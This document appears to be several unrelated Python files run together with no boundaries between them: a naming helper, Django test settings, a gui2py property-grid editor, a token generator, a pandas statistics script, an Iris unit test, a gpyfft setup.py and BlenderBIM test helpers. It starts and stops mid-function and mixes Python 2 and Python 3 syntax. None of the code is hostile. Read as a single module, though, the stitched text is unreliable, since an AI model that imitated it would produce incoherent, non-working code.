    # Only space-separated text is CamelCased; "Anti-Shake" has no
    # space, so its '-' is simply deleted by replace_punctuations,
    # giving 'AntiShake' (the old doctest said 'Antishake').
    if ' ' in text:
        text = camel_case(text)
    # '+<digits>' -> 'P<digits>' (P: plus), e.g. '+3' -> 'P3'
    text = re.sub(r'\+\d+', lambda x: x.group().replace('+', 'P'), text)
    # '-<digits>' -> 'N<digits>' (N: negative), e.g. '-3' -> 'N3'
    text = re.sub(r'\-\d+', lambda x: x.group().replace('-', 'N'), text)
    text = replace_punctuations(text)
    return remain_alnum(text)


def wrap_header_guard(lines, h_fn):
    """Wrap a C header guard around the given list of lines.

    The guard macro is derived from the header filename, e.g.
    'MsgID.h' -> 'MSG_ID_H_'.
    """
    def underscore(txt):
        """Convert a CamelCase text to under_score text (a text that is
        already under_scored passes through unchanged)."""
        step1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', txt)
        return re.sub('([a-z0-9])([A-Z])', r'\1_\2', step1).lower()

    guard = '%s_H_' % underscore(main_basename(h_fn)).upper()
    head = ['#ifndef %s' % guard,
            '#define %s' % guard,
            '', '']
    tail = ['', '', '#endif // %s' % guard, '']
    return head + lines + tail


def prefix_info(lines, software, version, author, comment_mark='//'):
    """Prefix generator/author/invocation info lines to the given lines,
    each starting with the given comment mark.
    """
    tool = os.path.basename(sys.argv[0])
    cmd_args = ' '.join(sys.argv[1:])
    header = [
        '%s Generated by the %s v%s' % (comment_mark, software, version),
        '%s    !author: %s' % (comment_mark, author),
        '%s    !trail: %s %s' % (comment_mark, tool, cmd_args),
    ]
    return header + lines




" Settings for tests. "
from settings.project import *

# Databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': ':memory:',
        'USER': '',
        'PASSWORD': '',
        'TEST_CHARSET': 'utf8',
    }}

# Caches
CACHES['default']['BACKEND'] = 'django.core.cache.backends.locmem.LocMemCache'
CACHES['default']['KEY_PREFIX'] = '_'.join((PROJECT_NAME, 'TST'))

# pymode:lint_ignore=W404

#!/usr/bin/python
# -*- coding: utf-8 -*-

"Visual Property Editor (using wx PropertyGrid) of gui2py's components"

__author__ = "Mariano Reingart (reingart@gmail.com)"
__copyright__ = "Copyright (C) 2013- Mariano Reingart"
__license__ = "LGPL 3.0"

# some parts were inspired by or borrowed from wxFormBuilder & wxPython examples


import sys, time, math, os, os.path

import wx
_ = wx.GetTranslation
import wx.propgrid as wxpg

from gui.component import InitSpec, StyleSpec, Spec, EventSpec, DimensionSpec
from gui.font import Font

DEBUG = False

class PropertyEditorPanel(wx.Panel):
    """Panel hosting a wx PropertyGrid used to inspect and edit the
    properties ("specs") of a gui2py component.

    NOTE(review): this is Python 2 code (print statements,
    ``except Exception, e`` syntax).
    """

    def __init__( self, parent, log ):
        """Build the grid, bind its events and draw empty categories.

        parent -- parent window
        log -- file-like object used for status messages
        """
        wx.Panel.__init__(self, parent, wx.ID_ANY)
        self.log = log
        # callback invoked when the edited object's 'name' changes
        self.callback = None

        self.panel = panel = wx.Panel(self, wx.ID_ANY)
        topsizer = wx.BoxSizer(wx.VERTICAL)

        # Difference between using PropertyGridManager vs PropertyGrid is that
        # the manager supports multiple pages and a description box.
        self.pg = pg = wxpg.PropertyGrid(panel,
                        style=wxpg.PG_SPLITTER_AUTO_CENTER |
                              wxpg.PG_AUTO_SORT |
                              wxpg.PG_TOOLBAR)

        # Show help as tooltips
        pg.SetExtraStyle(wxpg.PG_EX_HELP_AS_TOOLTIPS)

        pg.Bind( wxpg.EVT_PG_CHANGED, self.OnPropGridChange )
        pg.Bind( wxpg.EVT_PG_PAGE_CHANGED, self.OnPropGridPageChange )
        pg.Bind( wxpg.EVT_PG_SELECTED, self.OnPropGridSelect )
        pg.Bind( wxpg.EVT_PG_RIGHT_CLICK, self.OnPropGridRightClick )

        ##pg.AddPage( "Page 1 - Testing All" )
        # store the property grid for future reference
        self.pg = pg

        # load empty object (just draws categories)
        self.load_object(None)

        # sizing stuff:
        topsizer.Add(pg, 1, wx.EXPAND)
        panel.SetSizer(topsizer)
        topsizer.SetSizeHints(panel)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(panel, 1, wx.EXPAND)
        self.SetSizer(sizer)
        self.SetAutoLayout(True)

    def load_object(self, obj, callback=None):
        """Clear the grid and repopulate it with the specs of obj.

        obj -- gui2py component (None draws the empty categories only)
        callback -- optional callable notified when obj is renamed
        """
        pg = self.pg                    # get the property grid reference
        self.callback = callback        # store the update method

        # delete all properties
        pg.Clear()

        # clean references and aux structures
        appended = set()
        self.obj = obj
        self.groups = {}

        # loop on specs and append each property (categorized):
        for i, cat, class_ in ((1, 'Init Specs', InitSpec), 
                               (2, 'Dimension Specs', DimensionSpec),
                               (3, 'Style Specs', StyleSpec), 
                               (5, 'Events', EventSpec),
                               (4, 'Basic Specs', Spec),
                              ): 

            pg.Append(wxpg.PropertyCategory("%s - %s" % (i, cat)))
            if obj is None:
                continue
            # sort specs by name for a stable display order
            specs = sorted(obj._meta.specs.items(), key=lambda it: it[0])
            for name, spec in specs:
                if DEBUG: print "setting prop", spec, class_, spec.type
                if isinstance(spec, class_):
                    # map the spec type to the matching wxpg property class
                    prop = {'string': wxpg.StringProperty,
                            'integer': wxpg.IntProperty,
                            'float': wxpg.FloatProperty,
                            'boolean': wxpg.BoolProperty,
                            'text': wxpg.LongStringProperty,
                            'code': wxpg.LongStringProperty,
                            'enum': wxpg.EnumProperty,
                            'edit_enum': wxpg.EditEnumProperty,
                            'array': wxpg.ArrayStringProperty,
                            'expr': wxpg.StringProperty,
                            'font': wxpg.FontProperty,
                            'image_file': wxpg.ImageFileProperty,
                            'colour': wxpg.ColourProperty}.get(spec.type)
                    if prop and name not in appended:
                        value = getattr(obj, name)
                        if DEBUG: print "name", name, value
                        # normalize None values to a type-appropriate default
                        if spec.type == "code" and value is None:
                            value = ""
                        if spec.type == "boolean" and value is None:
                            value = False
                        if spec.type == "integer" and value is None:
                            value = -1
                        if spec.type in ("string", "text") and value is None:
                            value = ""
                        # expressions are edited as their repr() text
                        if spec.type == "expr":
                            value = repr(value)
                        if spec.type == "font":
                            if value is None:
                                value = wx.NullFont
                            else:
                                value = value.get_wx_font()
                        if callable(value):
                            # event binded at runtime cannot be modified:
                            value = str(value)
                            readonly = True
                        else:
                            readonly = False
                        if spec.type == "enum":
                            prop = prop(name, name, 
                                           spec.mapping.keys(), 
                                           spec.mapping.values(),
                                           value=spec.mapping.get(value, 0))
                        elif spec.type == "edit_enum":
                            prop = prop(name, name, 
                                           spec.mapping.keys(), 
                                           range(len(spec.mapping.values())),
                                           value=spec.mapping[value])
                        else:
                            try:
                                prop = prop(name, value=value)
                            except Exception, e:
                                print "CANNOT LOAD PROPERTY", name, value, e

                        # keep the spec reachable from the grid property
                        prop.SetPyClientData(spec)
                        appended.add(name)

                        if spec.group is None:
                            pg.Append(prop)
                            if readonly:
                                pg.SetPropertyReadOnly(prop)
                        else:
                            # create a group hierachy (wxpg uses dot notation)
                            group = ""
                            prop_parent = None
                            for grp in spec.group.split("."):
                                prev_group = group              # ancestor
                                group += ("." if group else "") + grp   # path
                                if group in self.groups:
                                    prop_parent = self.groups[group]
                                else:
                                    # placeholder parent node for the group
                                    prop_group = wxpg.StringProperty(grp,
                                            value="<composed>")
                                    if not prop_parent:
                                        pg.Append(prop_group)
                                    else:
                                        pg.AppendIn(prev_group, prop_group)
                                    prop_parent = prop_group
                                    self.groups[group] = prop_parent
                                    pg.SetPropertyReadOnly(group)
                            pg.AppendIn(spec.group, prop)
                            pg.Collapse(spec.group)
                            # fully-qualified name used for the helpers below
                            name = spec.group + "." + name

                        if spec.type == "boolean":
                            pg.SetPropertyAttribute(name, "UseCheckbox", True)
                        doc = spec.__doc__ 
                        if doc:
                            pg.SetPropertyHelpString(name, doc)


    def edit(self, name=""):
        "Programmatically select a (default) property to start editing it"
        # for more info see DoSelectAndEdit in propgrid.cpp
        # fall back through a list of commonly-present property names
        for name in (name, "label", "value", "text", "title", "filename", 
                           "name"):
            prop = self.pg.GetPropertyByName(name)
            if prop is not None:
                break
        self.Parent.SetFocus()
        self.Parent.Raise()
        self.pg.SetFocus()
        # give time to the ui to show the prop grid and set focus:
        wx.CallLater(250, self.select, prop.GetName())

    def select(self, name, flags=0):
        "Select a property (and start the editor)"
        # do not call this directly from another window, use edit() instead
        # // wxPropertyGrid::DoSelectProperty flags (selFlags) -see propgrid.h-
        wxPG_SEL_FOCUS=0x0001  # Focuses to created editor
        wxPG_SEL_FORCE=0x0002  # Forces deletion and recreation of editor
        flags |= wxPG_SEL_FOCUS # | wxPG_SEL_FORCE
        prop = self.pg.GetPropertyByName(name)
        self.pg.SelectProperty(prop, flags)
        if DEBUG: print "selected!", prop

    def OnPropGridChange(self, event):
        """Apply an edited property value back to the gui2py object."""
        p = event.GetProperty()
        if DEBUG: print "change!", p
        if p:
            name = p.GetName()
            spec = p.GetPyClientData()
            if spec and 'enum' in spec.type:
                value = p.GetValueAsString()
            else:
                value = p.GetValue()
            #self.log.write(u'%s changed to "%s"\n' % (p,p.GetValueAsString()))
            # if it a property child (parent.child), extract its name
            if "." in name:
                name = name[name.rindex(".") + 1:]
            if spec and not name in self.groups:
                if name == 'font':  # TODO: detect property type
                    # create a gui font from the wx.Font
                    font = Font()
                    font.set_wx_font(value)
                    value = font
                # expressions must be evaluated to store the python object
                if spec.type == "expr":
                    value = eval(value)
                # re-create the wx_object with the new property value
                # (this is required at least to apply new styles and init specs)
                if DEBUG: print "changed", self.obj.name
                kwargs = {str(name): value}
                wx.CallAfter(self.obj.rebuild,  **kwargs)
                if name == 'name':
                    # notify the owner that the object was renamed
                    wx.CallAfter(self.callback, **dict(name=self.obj.name))

    def OnPropGridSelect(self, event):
        """Log which property (if any) became selected."""
        p = event.GetProperty()
        if p:
            self.log.write(u'%s selected\n' % (event.GetProperty().GetName()))
        else:
            self.log.write(u'Nothing selected\n')

    def OnDeleteProperty(self, event):
        """Delete the currently selected property (warn when none)."""
        p = self.pg.GetSelectedProperty()
        if p:
            self.pg.DeleteProperty(p)
        else:
            wx.MessageBox("First select a property to delete")

    def OnReserved(self, event):
        # placeholder menu/event handler: intentionally does nothing
        pass

    def OnPropGridRightClick(self, event):
        """Log which property (if any) was right-clicked."""
        p = event.GetProperty()
        if p:
            self.log.write(u'%s right clicked\n' % (event.GetProperty().GetName()))
        else:
            self.log.write(u'Nothing right clicked\n')
        #self.obj.get_parent().Refresh()

    def OnPropGridPageChange(self, event):
        """Log the newly selected property-grid page."""
        index = self.pg.GetSelectedPage()
        self.log.write('Page Changed to \'%s\'\n' % (self.pg.GetPageName(index)))



if __name__ == '__main__':
    # Manual smoke test: show a frame with one sample control and a
    # PropertyEditorPanel editing it.
    import sys,os
    app = wx.App()
    f = wx.Frame(None)

    from gui.controls import Button, Label, TextBox, CheckBox, ListBox, ComboBox
    frame = wx.Frame(None)
    # Alternative sample controls, kept for manual testing:
    #o = Button(frame, name="btnTest", label="click me!", default=True)
    #o = Label(frame, name="lblTest", alignment="right", size=(-1, 500), text="hello!")
    o = TextBox(frame, name="txtTest", border=False, text="hello world!")
    #o = CheckBox(frame, name="chkTest", border='none', label="Check me!")
    #o = ListBox(frame, name="lstTest", border='none', 
    #            items={'datum1': 'a', 'datum2':'b', 'datum3':'c'},
    #            multiselect="--multiselect" in sys.argv)
    #o = ComboBox(frame, name="cboTest",
    #            items={'datum1': 'a', 'datum2':'b', 'datum3':'c'},
    #            readonly='--readonly' in sys.argv,
    #            )
    frame.Show()

    log = sys.stdout
    w = PropertyEditorPanel(f, log)
    w.load_object(o)
    f.Show()
    app.MainLoop()


#!/usr/bin/python3

import sys
from pathlib import Path

# Input file: one list-scope token per line; '#' starts a comment line.
list_scope_path = Path("./list_scope_tokens.txt")
# 1-based bit positions OR-ed into the generated token ids (see main()).
keyword_bit = 13
list_scope_bit = 14

def main():
	"""Generate token-id constants or emitter cases from the token list.

	Requires one command-line argument, 'tokens' or 'emitters'.
	Returns 0 on success, 1 on bad usage.
	"""
	if len(sys.argv) < 2:
		print("Error: Must specify an argument of either 'tokens' or 'emitters'!", file=sys.stderr)
		return 1

	# Read the token list, skipping blanks and '#' comment lines.
	list_scopes = set()
	with list_scope_path.open('r') as f:
		for raw_line in f:
			token = raw_line.strip()
			if not token or token.startswith('#'):
				continue
			list_scopes.add(token)

	# Widest token, used to align the generated columns.
	max_kw_len = max(len(kw) for kw in list_scopes)

	mode = sys.argv[1]
	if mode == 'tokens':
		# Ids start with the keyword and list-scope bits set.
		t_id = (1 << (keyword_bit - 1)) | (1 << (list_scope_bit - 1))
		for token in sorted(list_scopes):
			print('  {:<{width}} = 0x{:4X};'.format(token.upper(), t_id, width=max_kw_len))
			t_id += 1
	elif mode == 'emitters':
		for token in sorted(list_scopes):
			print('  {:<{width}} => T_{}(Lexeme);'.format('"' + token + '"', token.upper(), width=max_kw_len + 2))
	else:
		print("Error: Must specify an argument of either 'tokens' or 'emitters'!", file=sys.stderr)
		return 1

	return 0


# Script entry point: exit status propagates main()'s return code.
if __name__ == '__main__':
    sys.exit(main())

"""
Copyright (C) 2013 Matthew Woodruff

This script is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This script is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.

You should have received a copy of the GNU Lesser General Public License
along with this script. If not, see <http://www.gnu.org/licenses/>.

===========================================================

Coming in: one of 36 algo/problem combinations. 50 seeds in
one file.  Also the _Sobol file specifying the 
parameterization for each row, as well as the parameters
file itself.
Going out: stats: mean, quantile, variance
           grouped by parameterization
           grouped by some or all 2d combinations of 
           parameters
           
"""
import argparse
import pandas
import numpy
import re
import os
import copy

def is_quantile(stat):
    """Return a truthy match if stat is 'q' plus 1-2 digits, else None."""
    quantile_pattern = "q[0-9][0-9]?$"
    return re.match(quantile_pattern, stat)

def is_stat(stat):
    """argparse type-validator: return stat if it names a supported
    statistic, otherwise raise ArgumentTypeError."""
    known = ["mean", "variance", "min", "max", "q100"]
    if stat in known:
        return stat
    if is_quantile(stat):
        return stat
    raise argparse.ArgumentTypeError(
            "Invalid statistic {0}".format(stat))

def get_args():
    """Build and parse the command-line arguments.

    Positional: data, parameterizations and parameters files.
    Optional: statistics to compute, grouping columns, grid deltas
    and output directory.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("data", 
                        type=argparse.FileType("r"),
                        help="data file to be summarized."
                             "Should have columns seed, "\
                             "set, and metrics columns.")
    parser.add_argument("parameterizations",
                        type=argparse.FileType("r"),
                        help="file containing parameter"\
                             "izations.  Number of param"\
                             "eterizations should be the "\
                             "same as number of rows per "\
                             "seed in the data file."
                       )
    parser.add_argument("parameters",
                        type=argparse.FileType("r"),
                        help="file describing parameters. "\
                             "Should have as many rows as "\
                             "parameterizations file has "\
                             "columns."
                       )
    # default statistics; each name is validated by is_stat
    stats = ["mean", "variance", "q10", "q50", "q90"]
    parser.add_argument("-s", "--stats", nargs="+",
                        default = stats, type = is_stat,
                        help="statistics to compute")
    parser.add_argument("-g", "--group", nargs="+",
                        help="parameters by which to "\
                             "group.  Names should be "\
                             "found in the parameters "\
                             "file.  "
                       )
    parser.add_argument("-d", "--deltas",
                        help="If group is specified, "\
                             "deltas may be used to impose "\
                             "grid boxes on the summary "\
                             "rather than using point "\
                             "values.",
                         nargs="+", type = float
                       )
    parser.add_argument("-o", "--output-directory",
                        default="/gpfs/scratch/mjw5407/"
                                "task1/stats/"
                       )
    return parser.parse_args()

def compute(data, stat):
    """Evaluate the named statistic over data (a pandas object or
    groupby).  Falls through to None for unknown names, which is_stat
    prevents in practice."""
    if stat == "mean":
        return data.mean()
    if stat == "variance":
        return data.var()
    if is_quantile(stat):
        # 'qNN' -> fractional quantile; q0 means the minimum.
        quantile = float(stat[1:]) / 100.0
        if quantile == 0.0:
            return data.min()
        return data.quantile(quantile)
    if stat in ("max", "q100"):
        return data.max()
    if stat == "min":
        return data.min()

def analyze(data, stats, group=None, deltas=None):
    """Group data and compute each requested statistic per group.

    data -- pandas DataFrame; mutated when deltas are given (grid_*
            columns are added)
    stats -- statistic names accepted by compute()
    group -- column names to group by (defaults to ["Set"])
    deltas -- optional grid sizes; values in the matching group
              columns are snapped down to delta-sized boxes and the
              grouping uses the snapped grid_* columns instead
    Returns a list of (tag, computed-table) pairs.
    """
    results = []
    if group is None:
        group = ["Set"]
    # copy so substituting grid_* names below leaves group unchanged
    togroupby = copy.copy(group)
    ii = 0
    if deltas is None:
        togroupby = group
    else:
        while ii < len(group) and ii < len(deltas):
            colname = "grid_{0}".format(group[ii])
            # floor(value / delta) * delta snaps each value to its box
            gridnumbers = numpy.floor(data[group[ii]].apply(
                            lambda val: val / deltas[ii]))
            data[colname] = gridnumbers.apply(
                            lambda val: val * deltas[ii])
            togroupby[ii] = colname
            ii += 1
        
    print "analyzing grouped by {0}".format(group)
    gb = data.groupby(togroupby)
    for stat in stats:
        print "computing {0}".format(stat)
        # tag names the grouping and statistic, e.g. "Set_mean"
        tag = "{0}_{1}".format("_".join(group), stat)
        results.append((tag, compute(gb, stat)))
        
    return results

def write_result(infn, result, outputdir):
    """Write one (tag, table) result as a space-separated file.

    The output file is named "<tag>_<input basename>" with any
    trailing ".hv" extension stripped, placed inside outputdir.
    """
    fn = "_".join([result[0], os.path.basename(infn)])
    fn = re.sub("\.hv$", "", fn)
    fn = os.path.join(outputdir, fn)
    print "writing {0}".format(fn)
    result[1].to_csv(fn, sep=" ", index=True)    

def cli():
    """Command-line entry point: load inputs, summarize, write results."""
    args = get_args()
    data = pandas.read_table(args.data, sep=" ")

    # Parameter descriptions: one row per parameter (name, low, high).
    parameters = pandas.read_table(args.parameters, sep=" ",
                                   names=["name", "low", "high"],
                                   header=None)
    param_names = parameters["name"].values

    # One row per parameterization, columns named after the parameters.
    parameterizations = pandas.read_table(args.parameterizations,
                                          sep=" ",
                                          names=param_names,
                                          header=None)

    # Attach parameter values to each data row via its Set index.
    data = data.join(parameterizations, on=["Set"], how="outer")

    deltas = args.deltas if args.deltas is not None else []

    for result in analyze(data, args.stats, args.group, deltas):
        write_result(args.data.name, result, args.output_directory)

if __name__ == "__main__":
    cli()
# vim:ts=4:sw=4:expandtab:ai:colorcolumn=60:number:fdm=indent

# (C) British Crown Copyright 2014 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris.  If not, see <http://www.gnu.org/licenses/>.
"""
Test function :func:`iris.fileformats._pyke_rules.compiled_krb.\
fc_rules_cf_fc.build_auxiliary_coordinate`.

"""

from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip)  # noqa

# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests

import numpy as np
import mock

from iris.coords import AuxCoord
from iris.fileformats._pyke_rules.compiled_krb.fc_rules_cf_fc import \
    build_auxiliary_coordinate


class TestBoundsVertexDim(tests.IrisTest):
    """Check that build_auxiliary_coordinate accepts a bounds variable
    with its vertex dimension in any position, rolling the bounds so
    the vertex dimension ends up last.

    Refactor: the three test cases shared ~30 identical lines each;
    the common mock construction and assertions now live in the
    private helpers below.  Public interface (setUp and the test_*
    names) is unchanged.
    """

    def setUp(self):
        # Create coordinate cf variables and pyke engine.
        points = np.arange(6).reshape(2, 3)
        self.cf_coord_var = mock.Mock(
            dimensions=('foo', 'bar'),
            cf_name='wibble',
            standard_name=None,
            long_name='wibble',
            units='m',
            shape=points.shape,
            dtype=points.dtype,
            __getitem__=lambda self, key: points[key])

        self.engine = mock.Mock(
            cube=mock.Mock(),
            cf_var=mock.Mock(dimensions=('foo', 'bar')),
            filename='DUMMY',
            provides=dict(coordinates=[]))

        # Create patch for deferred loading that prevents attempted
        # file access. This assumes that self.cf_bounds_var is
        # defined in the test case.
        def patched__getitem__(proxy_self, keys):
            variable = None
            for var in (self.cf_coord_var, self.cf_bounds_var):
                if proxy_self.variable_name == var.cf_name:
                    return var[keys]
            raise RuntimeError()

        self.deferred_load_patch = mock.patch(
            'iris.fileformats.netcdf.NetCDFDataProxy.__getitem__',
            new=patched__getitem__)

    def _set_cf_bounds_var(self, bounds, dimensions):
        # Create the bounds cf variable with the given dimension names.
        self.cf_bounds_var = mock.Mock(
            dimensions=dimensions,
            cf_name='wibble_bnds',
            shape=bounds.shape,
            dtype=bounds.dtype,
            __getitem__=lambda self, key: bounds[key])

    def _check_build(self, expected_bounds):
        # Run the rule and assert the expected coordinate is built,
        # added to the cube, and recorded in engine.provides.
        expected_coord = AuxCoord(
            self.cf_coord_var[:],
            long_name=self.cf_coord_var.long_name,
            var_name=self.cf_coord_var.cf_name,
            units=self.cf_coord_var.units,
            bounds=expected_bounds)

        # Patch the helper function that retrieves the bounds cf variable.
        # This avoids the need for setting up further mocking of cf objects.
        get_cf_bounds_var_patch = mock.patch(
            'iris.fileformats._pyke_rules.compiled_krb.'
            'fc_rules_cf_fc.get_cf_bounds_var',
            return_value=self.cf_bounds_var)

        # Asserts must lie within context manager because of deferred loading.
        with self.deferred_load_patch, get_cf_bounds_var_patch:
            build_auxiliary_coordinate(self.engine, self.cf_coord_var)

            # Test that expected coord is built and added to cube.
            self.engine.cube.add_aux_coord.assert_called_with(
                expected_coord, [0, 1])

            # Test that engine.provides container is correctly populated.
            expected_list = [(expected_coord, self.cf_coord_var.cf_name)]
            self.assertEqual(self.engine.provides['coordinates'],
                             expected_list)

    def test_slowest_varying_vertex_dim(self):
        bounds = np.arange(24).reshape(4, 2, 3)
        self._set_cf_bounds_var(bounds, ('nv', 'foo', 'bar'))
        # Expected bounds on the resulting coordinate should be rolled so
        # that the vertex dimension is at the end.
        self._check_build(np.rollaxis(bounds, 0, bounds.ndim))

    def test_fastest_varying_vertex_dim(self):
        bounds = np.arange(24).reshape(2, 3, 4)
        self._set_cf_bounds_var(bounds, ('foo', 'bar', 'nv'))
        self._check_build(bounds)

    def test_fastest_with_different_dim_names(self):
        # Despite the dimension names ('x', and 'y') differing from the coord's
        # which are 'foo' and 'bar' (as permitted by the cf spec),
        # this should still work because the vertex dim is the fastest varying.
        bounds = np.arange(24).reshape(2, 3, 4)
        self._set_cf_bounds_var(bounds, ('x', 'y', 'nv'))
        self._check_build(bounds)


# Standard Iris test-module entry point.
if __name__ == '__main__':
    tests.main()

import os
import platform
from setuptools import setup, Extension
from distutils.util import convert_path
from Cython.Build import cythonize

system = platform.system()

## paths settings
# Per-platform locations of the clFFT sources/libraries and OpenCL headers.
# Linux
if 'Linux' in system:
    CLFFT_DIR = r'/home/gregor/devel/clFFT'
    CLFFT_LIB_DIRS = [r'/usr/local/lib64']
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'src', 'include'), ]
    CL_INCL_DIRS = ['/opt/AMDAPPSDK-3.0/include']
    EXTRA_COMPILE_ARGS = []
    EXTRA_LINK_ARGS = []

# Windows
elif 'Windows' in system:
    CLFFT_DIR = r'C:\Users\admin\Devel\clFFT-Full-2.12.2-Windows-x64'
    # BUG FIX: was os.path.join(CLFFT_DIR, 'lib64\import') — '\i' in a
    # non-raw string is an invalid escape sequence; join the components
    # portably instead (identical resulting path on Windows).
    CLFFT_LIB_DIRS = [os.path.join(CLFFT_DIR, 'lib64', 'import')]
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'include'), ]
    CL_DIR = os.getenv('AMDAPPSDKROOT')
    CL_INCL_DIRS = [os.path.join(CL_DIR, 'include')]
    EXTRA_COMPILE_ARGS = []
    EXTRA_LINK_ARGS = []

# macOS
elif 'Darwin' in system:
    CLFFT_DIR = r'/Users/gregor/Devel/clFFT'
    CLFFT_LIB_DIRS = [r'/Users/gregor/Devel/clFFT/src/library']
    CLFFT_INCL_DIRS = [os.path.join(CLFFT_DIR, 'src', 'include'), ]
    CL_INCL_DIRS = []
    EXTRA_COMPILE_ARGS = ['-stdlib=libc++']
    EXTRA_LINK_ARGS = ['-stdlib=libc++']

else:
    # Previously an unknown platform surfaced later as a NameError on
    # CLFFT_INCL_DIRS; fail early with a clear message instead.
    raise RuntimeError("Unsupported platform: %s" % system)

import Cython.Compiler.Options
# Generate module cleanup code (frees module-level Python objects on exit).
Cython.Compiler.Options.generate_cleanup_code = 2

# Cython extension module wrapping the clFFT C++ API.
extensions = [
    Extension("gpyfft.gpyfftlib",
              [os.path.join('gpyfft', 'gpyfftlib.pyx')],
              include_dirs= CLFFT_INCL_DIRS + CL_INCL_DIRS,
              extra_compile_args=EXTRA_COMPILE_ARGS,
              extra_link_args=EXTRA_LINK_ARGS,
              libraries=['clFFT'],
              library_dirs = CLFFT_LIB_DIRS,
              language='c++',
              )
    ]

def copy_clfftdll_to_package():
    """Copy the clFFT runtime DLLs into the package directory (Windows builds)."""
    import shutil
    for dll_name in ('clFFT.dll', 'StatTimer.dll'):
        shutil.copy(os.path.join(CLFFT_DIR, 'bin', dll_name), 'gpyfft')
    print("copied clFFT.dll, StatTimer.dll")

# On Windows the clFFT DLLs are bundled into the package so the built
# distribution is self-contained.
package_data = {}
if 'Windows' in platform.system():
    copy_clfftdll_to_package()
    package_data.update({'gpyfft': ['clFFT.dll', 'StatTimer.dll']},)


def get_version():
    """Read __version__ from gpyfft/version.py without importing the package."""
    namespace = {}
    with open(convert_path('gpyfft/version.py')) as version_file:
        exec(version_file.read(), namespace)
    return namespace['__version__']


def get_readme():
    """Return the text of the README.md located beside this setup script."""
    readme_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), "README.md")
    with open(readme_path, "r") as fp:
        return fp.read()


# Unversioned dependency pins: runtime and build-time requirements.
install_requires = ["numpy", "pyopencl"]
setup_requires = ["numpy", "cython"]


setup(
    name='gpyfft',
    version=get_version(),
    description='A Python wrapper for the OpenCL FFT library clFFT',
    long_description=get_readme(),
    url=r"https://github.com/geggo/gpyfft",
    maintainer='Gregor Thalhammer',
    maintainer_email='gregor.thalhammer@gmail.com',
    license='LGPL',
    packages=['gpyfft', "gpyfft.test"],
    # Compile the .pyx extension defined above.
    ext_modules=cythonize(extensions),
    package_data=package_data,
    install_requires=install_requires,
    setup_requires=setup_requires,
    )

# BlenderBIM Add-on - OpenBIM Blender Add-on
# Copyright (C) 2021 Dion Moult <dion@thinkmoult.com>
#
# This file is part of BlenderBIM Add-on.
#
# BlenderBIM Add-on is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BlenderBIM Add-on is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BlenderBIM Add-on.  If not, see <http://www.gnu.org/licenses/>.


import os
import re
import bpy
import pytest
import webbrowser
import blenderbim
import ifcopenshell
import ifcopenshell.util.representation
from blenderbim.bim.ifc import IfcStore
from mathutils import Vector

# Monkey-patch webbrowser opening since we want to test headlessly
webbrowser.open = lambda x: True


# Values substituted into scenario text via "{name}" placeholders by run().
variables = {"cwd": os.getcwd(), "ifc": "IfcStore.get_file()"}


class NewFile:
    """Fixture mixin: every test starts from a fresh, empty Blender file."""

    @pytest.fixture(autouse=True)
    def setup(self):
        IfcStore.purge()
        bpy.ops.wm.read_homefile(app_template="")
        # Only purge when objects exist; orphans_purge on an empty file is skipped.
        if bpy.data.objects:
            bpy.data.batch_remove(bpy.data.objects)
            bpy.ops.outliner.orphans_purge(do_local_ids=True, do_linked_ids=True, do_recursive=True)
        blenderbim.bim.handler.setDefaultProperties(None)


class NewIfc:
    """Fixture mixin: fresh Blender file with a brand-new IFC project created."""

    @pytest.fixture(autouse=True)
    def setup(self):
        IfcStore.purge()
        bpy.ops.wm.read_homefile(app_template="")
        bpy.data.batch_remove(bpy.data.objects)
        bpy.ops.outliner.orphans_purge(do_local_ids=True, do_linked_ids=True, do_recursive=True)
        blenderbim.bim.handler.setDefaultProperties(None)
        bpy.ops.bim.create_project()


def scenario(function):
    """Decorator: execute the Gherkin text returned by *function* via run()."""
    def inner(self):
        run(function(self))

    return inner


def scenario_debug(function):
    """Decorator: execute the Gherkin text returned by *function* via run_debug()."""
    def inner(self):
        run_debug(function(self))

    return inner


def an_empty_ifc_project():
    """Step: create a brand-new IFC project."""
    bpy.ops.bim.create_project()


def i_add_a_cube():
    """Step: add a default cube at the origin."""
    bpy.ops.mesh.primitive_cube_add()


def i_add_a_cube_of_size_size_at_location(size, location):
    """Step: add a cube of the given size at comma-separated "x,y,z"."""
    bpy.ops.mesh.primitive_cube_add(size=float(size), location=[float(co) for co in location.split(",")])


def the_object_name_is_selected(name):
    """Step: make *name* the only selected (and active) object."""
    i_deselect_all_objects()
    additionally_the_object_name_is_selected(name)


def additionally_the_object_name_is_selected(name):
    """Step: select *name* and make it active, without deselecting others.

    Fails the scenario when no object of that name exists in the scene.
    """
    obj = bpy.context.scene.objects.get(name)
    if not obj:
        # BUG FIX: the failure message was a plain string literal, so the
        # object name was never interpolated; it needs the f-prefix.
        assert False, f'The object "{name}" could not be selected'
    bpy.context.view_layer.objects.active = obj
    obj.select_set(True)


def i_deselect_all_objects():
